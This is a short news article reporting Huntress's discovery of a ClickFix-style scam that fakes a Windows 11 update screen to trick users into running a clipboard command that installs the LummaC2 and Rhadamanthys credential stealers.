Huntress uncovers a ClickFix-style scam mimicking Windows 11 Update Center. A clipboard command installs LummaC2 and Rhadamanthys to steal credentials, wallets.
© RusPhotoBank
Cybersecurity specialists at Huntress have uncovered a new wave of attacks built around a ClickFix-style ploy that presents a malicious process as a mandatory Windows 11 update. Targets are shown a full-screen counterfeit of the Windows Update Center that is almost indistinguishable from the real interface, creating a convincing sense of legitimacy.
People are prompted to update their system, while a command is quietly placed into the clipboard. The ruse then steers the user to open Win + R, paste the prepared string, and confirm its execution—so the malicious code is launched by the user’s own action. Because it looks like a routine system step, many defenses are sidestepped.
Once activated, the scheme downloads and installs LummaC2 and Rhadamanthys. These tools specialize in the covert collection of sensitive information, ranging from account credentials and cookies to cryptocurrency wallet data and saved passwords. Researchers say the campaign has been unfolding since early October, but its scale remains unclear, with no victim counts disclosed. The risk is heightened by how authentic the lure appears and by the fact that the user effectively initiates the malicious sequence without suspecting it—precisely the kind of social engineering that proves most effective.